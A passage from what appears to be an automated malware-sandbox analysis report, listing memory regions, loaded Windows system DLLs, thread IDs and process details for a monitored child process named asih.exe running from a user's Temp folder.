region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 1012 start_va = 0x7ffc25ff0000 end_va = 0x7ffc2602afff monitored = 0 entry_point = 0x7ffc25ff4000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1013 start_va = 0x7ffc26030000 end_va = 0x7ffc26056fff monitored = 0 entry_point = 0x7ffc26036200 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1014 start_va = 0x7ffc26140000 end_va = 0x7ffc26151fff monitored = 0 entry_point = 0x7ffc261455f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1015 start_va = 0x7ffc26300000 end_va = 0x7ffc2632bfff monitored = 0 entry_point = 0x7ffc26307370 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1016 start_va = 0x7ffc26350000 end_va = 0x7ffc26361fff monitored = 0 entry_point = 0x7ffc26353e30 region_type = mapped_file name = "umpdc.dll" filename = "\\Windows\\System32\\umpdc.dll" (normalized: "c:\\windows\\system32\\umpdc.dll") Region: id = 1017 start_va = 0x7ffc26370000 end_va = 0x7ffc263bafff monitored = 0 entry_point = 0x7ffc26373480 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1018 start_va = 0x7ffc263c0000 end_va = 0x7ffc26461fff monitored = 0 entry_point = 0x7ffc263eca60 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1019 start_va = 0x7ffc26470000 end_va = 0x7ffc2649dfff monitored = 0 entry_point = 0x7ffc26474f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1020 start_va = 0x7ffc264a0000 end_va = 0x7ffc264d0fff monitored = 0 entry_point = 0x7ffc264ae380 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1021 start_va = 0x7ffc264f0000 end_va = 0x7ffc2650efff monitored = 0 entry_point = 0x7ffc264f8ca0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1022 start_va = 0x7ffc265b0000 end_va = 0x7ffc2662efff monitored = 0 entry_point = 0x7ffc265e73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1023 start_va = 0x7ffc26630000 end_va = 0x7ffc26739fff monitored = 0 entry_point = 0x7ffc26661300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 1024 start_va = 0x7ffc26740000 end_va = 0x7ffc26766fff monitored = 0 entry_point = 0x7ffc26748690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1025 start_va = 0x7ffc26770000 end_va = 0x7ffc267cffff monitored = 0 entry_point = 0x7ffc26780380 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1026 start_va = 0x7ffc267d0000 end_va = 0x7ffc2692cfff monitored = 0 entry_point = 0x7ffc2681efa0 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1027 start_va = 0x7ffc269e0000 end_va = 0x7ffc26adffff monitored = 0 entry_point = 0x7ffc269f5ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1028 start_va = 0x7ffc26ae0000 end_va = 0x7ffc26b7cfff monitored = 0 entry_point = 0x7ffc26af5390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 1029 start_va = 0x7ffc26b80000 end_va = 0x7ffc26e46fff monitored = 0 entry_point = 0x7ffc26b91bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1030 start_va = 0x7ffc26e50000 end_va = 0x7ffc26e9cfff monitored = 0 entry_point = 0x7ffc26e63280 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1031 start_va = 0x7ffc26ea0000 end_va = 0x7ffc26ec1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 1032 start_va = 0x7ffc26ed0000 end_va = 0x7ffc26ed8fff monitored = 0 entry_point = 0x7ffc26ed2020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1033 start_va = 0x7ffc26ee0000 end_va = 0x7ffc26f89fff monitored = 0 entry_point = 0x7ffc26ef5470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1034 start_va = 0x7ffc26f90000 end_va = 0x7ffc2702dfff monitored = 0 entry_point = 0x7ffc26f97850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1035 start_va = 0x7ffc27110000 end_va = 0x7ffc27463fff monitored = 0 entry_point = 0x7ffc27201d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1036 start_va = 0x7ffc27470000 end_va = 0x7ffc2760ffff monitored = 0 entry_point = 0x7ffc27487a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1037 start_va = 0x7ffc277c0000 end_va = 0x7ffc27814fff monitored = 0 entry_point = 0x7ffc277ca7e0 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1038 start_va = 0x7ffc27820000 end_va = 0x7ffc27948fff monitored = 0 entry_point = 0x7ffc27846140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1039 start_va = 0x7ffc27950000 end_va = 0x7ffc27a72fff monitored = 0 entry_point = 0x7ffc279ada30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1040 start_va = 0x7ffc27a80000 end_va = 0x7ffc27ee6fff monitored = 0 entry_point = 0x7ffc27aa3230 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1041 start_va = 0x7ffc27ef0000 end_va = 0x7ffc27f5afff monitored = 0 entry_point = 0x7ffc27f04300 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1042 start_va = 0x7ffc27f70000 end_va = 0x7ffc2802cfff monitored = 0 entry_point = 0x7ffc27f87070 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1043 start_va = 0x7ffc28030000 end_va = 0x7ffc28104fff monitored = 0 entry_point = 0x7ffc2804d190 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1044 start_va = 0x7ffc28110000 end_va = 0x7ffc28224fff monitored = 0 entry_point = 0x7ffc2814eb60 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1045 start_va = 0x7ffc28230000 end_va = 0x7ffc282a8fff monitored = 0 entry_point = 0x7ffc282528f0 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 1046 start_va = 0x7ffc282b0000 end_va = 0x7ffc2834afff monitored = 0 entry_point = 0x7ffc282cc3e0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1047 start_va = 0x7ffc28350000 end_va = 0x7ffc283fdfff monitored = 0 entry_point = 0x7ffc2838b940 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1048 start_va = 0x7ffc28470000 end_va = 0x7ffc28517fff monitored = 0 entry_point = 0x7ffc2848d990 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1049 start_va = 0x7ffc28610000 end_va = 0x7ffc28639fff monitored = 0 entry_point = 0x7ffc286148d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1050 start_va = 0x7ffc28640000 end_va = 0x7ffc2865cfff monitored = 0 entry_point = 0x7ffc286423b0 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 1051 start_va = 0x7ffc286c0000 end_va = 0x7ffc286effff monitored = 0 entry_point = 0x7ffc286c14d0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1052 start_va = 0x7ffc286f0000 end_va = 0x7ffc28e20fff monitored = 0 entry_point = 0x7ffc287fe6e0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1053 start_va = 0x7ffc28e70000 end_va = 0x7ffc29063fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1295 start_va = 0xf840000 end_va = 0x10223fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f840000" filename = "" Region: id = 1296 start_va = 0x10230000 end_va = 0x10721fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010230000" filename = "" Region: id = 1297 start_va = 0x450000 end_va = 0x452fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1298 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1299 start_va = 0xf840000 end_va = 0x10223fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f840000" filename = "" Region: id = 1302 start_va = 0x10c30000 end_va = 0x11121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010c30000" filename = "" Region: id = 1303 start_va = 0x3e70000 end_va = 0x3eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Thread: id = 17 os_tid = 0x12c4 Thread: id = 18 os_tid = 0x1254 Thread: id = 19 os_tid = 0x16c8 Thread: id = 20 os_tid = 0x16b8 Thread: id = 21 os_tid = 0x16b0 Thread: id = 22 os_tid = 0x16a4 Thread: id = 23 os_tid = 0x16a0 Thread: id = 24 os_tid = 0x1694 Thread: id = 25 os_tid = 0x14f0 Thread: id = 26 os_tid = 0x13a0 Thread: id = 27 os_tid = 0xe30 Thread: id = 28 os_tid = 0xc30 Thread: id = 29 os_tid = 0x288 Thread: id = 30 os_tid = 0x540 Thread: id = 31 os_tid = 0x828 Thread: id = 32 os_tid = 0xe5c Thread: id = 33 os_tid = 0xdac Thread: id = 34 os_tid = 0x824 Thread: id = 35 os_tid = 0xefc Thread: id = 36 os_tid = 0xef8 Thread: id = 37 os_tid = 0xef0 Thread: id = 38 os_tid = 0xeec Thread: id = 39 os_tid = 0xd84 Thread: id = 40 os_tid = 0xcc0 Thread: id = 41 os_tid = 0xcb0 Thread: id = 42 os_tid = 0xc98 Thread: id = 43 os_tid = 0xc94 Thread: id = 44 os_tid = 0xc90 Thread: id = 45 os_tid = 0xc8c Thread: id = 46 os_tid = 0xc88 Thread: id = 47 os_tid = 0xc54 Thread: id = 48 os_tid = 0xc28 Thread: id = 49 os_tid = 0xc24 Thread: id = 50 os_tid = 0x87c Thread: id = 51 os_tid = 0xbac Thread: id = 52 os_tid = 0xba8 Thread: id = 53 os_tid = 0xba0 Thread: id = 54 os_tid = 0xb9c Thread: id = 55 os_tid = 0xb98 Thread: id = 56 os_tid = 0xb94 Thread: id = 57 os_tid = 0xb84 Thread: id = 58 os_tid = 0xb80 Thread: id = 59 os_tid = 0xb6c Thread: id = 60 os_tid = 0xb64 Thread: id = 61 os_tid = 0xb60 Thread: id = 62 os_tid = 0xae8 Thread: id = 63 os_tid = 0xad4 Thread: id = 64 os_tid = 0xaa8 Thread: id = 65 os_tid = 0xa70 Thread: id = 66 os_tid = 0xa58 Thread: id = 67 os_tid = 0xa40 Thread: id = 68 os_tid = 0xa2c Thread: id = 69 os_tid = 0xa28 Thread: id = 70 os_tid = 0xa08 Thread: id = 92 os_tid = 0xb14 Process: id = "4" image_name = "asih.exe" filename = "c:\\users\\oqxzraykm\\appdata\\local\\temp\\asih.exe" page_root = "0x30672000" os_pid = "0x1428" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x17b0" cmd_line = "\"C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\asih.exe\" " cur_dir = "C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\" os_username = "PXTHFFRYO7\\OqXZRaykm" bitness = "32" os_groups = "PXTHFFRYO7\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001d295" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1055 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1056 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1057 start_va = 0x40000 end_va = 0x5cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1058 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1059 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1060 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1061 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x501000 region_type = mapped_file name = "asih.exe" filename = "\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\asih.exe" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\temp\\asih.exe") Region: id = 1062 start_va = 0x77ca0000 end_va = 0x77e41fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1063 start_va = 0x7ffa0000 end_va = 0x7ffa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffa0000" filename = "" Region: id = 1064 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1065 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1066 start_va = 0x7fff0000 end_va = 0xffffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1067 start_va = 0x7ffc28e70000 end_va = 0x7ffc29063fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1069 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1070 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1071 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1072 start_va = 0x7ff90000 end_va = 0x7ff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff90000" filename = "" Region: id = 1073 start_va = 0x7ff70000 end_va = 0x7ff80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff70000" filename = "" Region: id = 1074 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1075 start_va = 0x7ffc28400000 end_va = 0x7ffc28458fff monitored = 0 entry_point = 0x7ffc28418ff0 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1076 start_va = 0x7ffc28580000 end_va = 0x7ffc28602fff monitored = 0 entry_point = 0x7ffc2858fb00 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1077 start_va = 0x77c90000 end_va = 0x77c99fff monitored = 0 entry_point = 0x77c912e0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1078 start_va = 0x7ff60000 end_va = 0x7ff61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff60000" filename = "" Region: id = 1079 start_va = 0x7ff50000 end_va = 0x7ff58fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ff50000" filename = "" Region: id = 1080 start_va = 0x510000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1081 start_va = 0x76fe0000 end_va = 0x770cffff monitored = 0 entry_point = 0x76fff5a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1082 start_va = 0x77980000 end_va = 0x77b92fff monitored = 0 entry_point = 0x77a94030 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1083 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1084 start_va = 0x7fe50000 end_va = 0x7ff4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fe50000" filename = "" Region: id = 1085 start_va = 0x400000 end_va = 0x4c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1086 start_va = 0x75ae0000 end_va = 0x75b7efff monitored = 0 entry_point = 0x75b185c0 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1087 start_va = 0x7fa70000 end_va = 0x7fe4cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\apppatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 1088 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1089 start_va = 0x75d90000 end_va = 0x75db2fff monitored = 0 entry_point = 0x75d973c0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1090 start_va = 0x76ad0000 end_va = 0x76ae7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\SysWOW64\\win32u.dll" (normalized: "c:\\windows\\syswow64\\win32u.dll") Region: id = 1091 start_va = 0x510000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 1092 start_va = 0x640000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 1093 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 1094 start_va = 0x75b80000 end_va = 0x75c5afff monitored = 0 entry_point = 0x75bdfc10 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\SysWOW64\\gdi32full.dll" (normalized: "c:\\windows\\syswow64\\gdi32full.dll") Region: id = 1095 start_va = 0x77130000 end_va = 0x771aafff monitored = 0 entry_point = 0x77147800 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\SysWOW64\\msvcp_win.dll" (normalized: "c:\\windows\\syswow64\\msvcp_win.dll") Region: id = 1096 start_va = 0x75c70000 end_va = 0x75d8ffff monitored = 0 entry_point = 0x75c9b170 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\SysWOW64\\ucrtbase.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase.dll") Region: id = 1097 start_va = 0x75dc0000 end_va = 0x75f53fff monitored = 0 entry_point = 0x75df9860 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1098 start_va = 0x30000 end_va = 0x37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1099 start_va = 0x4d0000 end_va = 0x4f2fff monitored = 0 entry_point = 0x4d4410 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1100 start_va = 0x840000 end_va = 0xa3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 1101 start_va = 0x764d0000 end_va = 0x764f4fff monitored = 0 entry_point = 0x764d4410 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1102 start_va = 0xa40000 end_va = 0xbc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 1103 start_va = 0xbd0000 end_va = 0x1fd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 1104 start_va = 0x74a20000 end_va = 0x74a93fff monitored = 0 entry_point = 0x74a57550 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1105 start_va = 0x76af0000 end_va = 0x76baefff monitored = 0 entry_point = 0x76b25ac0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1106 start_va = 0x76600000 end_va = 0x7687ffff monitored = 0 entry_point = 0x7673a960 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1107 start_va = 0x76410000 end_va = 0x764c9fff monitored = 0 entry_point = 0x7644a2c0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1108 start_va = 0x1fe0000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 1109 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1110 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1111 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 1112 start_va = 0x550000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1113 start_va = 0x76e10000 end_va = 0x76ee1fff monitored = 0 entry_point = 0x76e5d9d0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1114 start_va = 0x76ef0000 end_va = 0x76f8afff monitored = 0 entry_point = 0x76f25a20 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1115 start_va = 0x76bb0000 end_va = 0x76c24fff monitored = 0 entry_point = 0x76bcf710 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1116 start_va = 0x1fe0000 end_va = 0x20c1fff monitored = 0 entry_point = 0x200c600 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1117 start_va = 0x2170000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 1118 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 1119 start_va = 0x1fe0000 end_va = 0x20c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fe0000" filename = "" Region: id = 1120 start_va = 0x4e0000 end_va = 0x4e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 1121 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 1122 start_va = 0x550000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1123 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 1124 start_va = 0x5d0000 end_va = 0x5d5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1125 start_va = 0x5e0000 end_va = 0x5e5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1126 start_va = 0x4e0000 end_va = 0x4e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1127 start_va = 0x600000 end_va = 0x604fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 1128 start_va = 0x610000 end_va = 0x615fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 1129 start_va = 0x72ae0000 end_va = 0x72f37fff monitored = 0 entry_point = 0x72e022f0 region_type = mapped_file name = 